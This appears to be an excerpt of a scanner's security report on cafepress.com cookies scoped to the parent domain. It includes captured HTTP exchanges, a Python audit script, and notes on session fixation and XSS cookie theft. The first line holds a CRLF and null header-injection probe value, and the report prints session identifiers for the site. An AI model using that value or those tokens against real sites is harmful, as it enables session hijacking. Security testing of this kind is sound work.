Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 95181
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
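The check that produces findings 2.4 through 2.13 of this section, re-implemented as an added example so it can be run over the captured Set-Cookie headers. This is not the scanner's code and not CafePress code. The headers embedded below are copied from the 2.4 response above and from the 2.5 response that follows; the issuing host www.cafepress.com is the Host header of the captured requests; the `example_hostonly` cookie is a constructed control, and the session-name regex is an assumption modelled loosely on the scanner's heuristic, not its actual rule. Run over both responses it reports that every cookie is domain-scoped to cafepress.com (the registrable domain, which is the widest scope a browser will accept), that ASP.NET_SessionId carries HttpOnly in the 2.4 response but is re-issued without it on the category pages from 2.5 onward, and that no cookie carries Secure. It also checks that the session identifier in the request's Cookie header is exactly what the response sets back, which is the precondition a tester would follow up on for session fixation, not a finding in itself.

```python
"""Added example: 'cookie scoped to parent domain' check over Set-Cookie headers
captured in this report. Not the scanner's own code and not CafePress code."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Issuing host, taken from the Host header of the captured requests.
ISSUING_HOST = "www.cafepress.com"

# Set-Cookie values copied from the 2.4 response (product page).
RESPONSE_2_4 = [
    "ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly",
    "cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/",
    "cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/",
]
# Set-Cookie values copied from the 2.5 response (/+aprons), where the same
# session id comes back without HttpOnly, plus one constructed control.
RESPONSE_2_5 = [
    "cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/",
    "ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/",
    "example_hostonly=1; path=/",  # constructed: no Domain attribute, so host-only
]
# The 2.5 request's Cookie header, shortened to the session cookie and its neighbours.
REQUEST_2_5_COOKIE = "cp_sc=100007; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; cppss=3x0"

# Assumption: a name heuristic in the spirit of the scanner's, not its real rule.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


@dataclass
class Cookie:
    name: str
    value: str
    domain: str | None = None  # None means host-only (RFC 6265 section 5.3)
    path: str | None = None
    http_only: bool = False
    secure: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie value: name=value, then ';'-separated attributes.
    Attribute names are case-insensitive, HttpOnly/Secure are valueless flags,
    and a leading dot on Domain is ignored (as browsers do)."""
    name_value, *attrs = [p.strip() for p in header.split(";")]
    name, _, value = name_value.partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in attrs:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            cookie.domain = val.lstrip(".").lower()
        elif key == "path":
            cookie.path = val
        elif key == "httponly":
            cookie.http_only = True
        elif key == "secure":
            cookie.secure = True
    return cookie


def scoped_to_parent(cookie: Cookie, host: str) -> bool:
    """True when an explicit Domain attribute names a proper parent of the issuing
    host, so every host under that domain receives the cookie, not only the issuer.
    (No public-suffix check: a browser would reject a Domain of, say, 'com' anyway.)"""
    if cookie.domain is None:
        return False
    host = host.lower()
    return cookie.domain != host and host.endswith("." + cookie.domain)


def audit(set_cookie_headers: list[str], host: str = ISSUING_HOST) -> dict[str, list[str]]:
    """Map each parent-scoped cookie name to the risk markers worth reporting."""
    findings: dict[str, list[str]] = {}
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header)
        if not scoped_to_parent(cookie, host):
            continue
        markers = []
        if SESSION_NAME_RE.search(cookie.name):
            markers.append("session-token")
        if not cookie.http_only:
            markers.append("no-HttpOnly")
        if not cookie.secure:
            markers.append("no-Secure")
        findings[cookie.name] = markers
    return findings


def parse_cookie_header(header: str) -> dict[str, str]:
    """Parse a request Cookie header ('name=value; name=value'); values may contain '='."""
    pairs: dict[str, str] = {}
    for item in header.split(";"):
        if item.strip():
            name, _, value = item.strip().partition("=")
            pairs[name.strip()] = value.strip()
    return pairs


def reissued_unchanged(request_cookie_header: str, set_cookie_headers: list[str], name: str) -> bool:
    """True when the server sets `name` back to exactly the value the client sent,
    i.e. it adopted the client-supplied identifier instead of minting its own."""
    sent = parse_cookie_header(request_cookie_header).get(name)
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header)
        if cookie.name == name:
            return sent is not None and cookie.value == sent
    return False


if __name__ == "__main__":
    for label, headers in (("2.4", RESPONSE_2_4), ("2.5", RESPONSE_2_5)):
        for cookie_name, markers in audit(headers).items():
            print(f"{label}: {cookie_name:<20} {' '.join(markers)}")
    print("session id reissued unchanged:",
          reissued_unchanged(REQUEST_2_5_COOKIE, RESPONSE_2_5, "ASP.NET_SessionId"))
```

The parent-domain test is the only thing the scanner's finding rests on; the HttpOnly and Secure markers are added here because they are what decides how much a parent-scoped session cookie actually costs: a cookie readable from any cafepress.com host by script, and sent over plain HTTP, is the one an XSS elsewhere on the domain would harvest.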
2.5. http://www.cafepress.com/+aprons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue (note that it is re-issued here without the HttpOnly flag it carried in 2.4). You should review the contents of the cookies to determine their function.
Request
GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 60330
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.6. http://www.cafepress.com/+baby-blanket
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58677
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.7. http://www.cafepress.com/+baby-bodysuits
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59167
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.8. http://www.cafepress.com/+baby-hat
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58517
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.9. http://www.cafepress.com/+bags
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
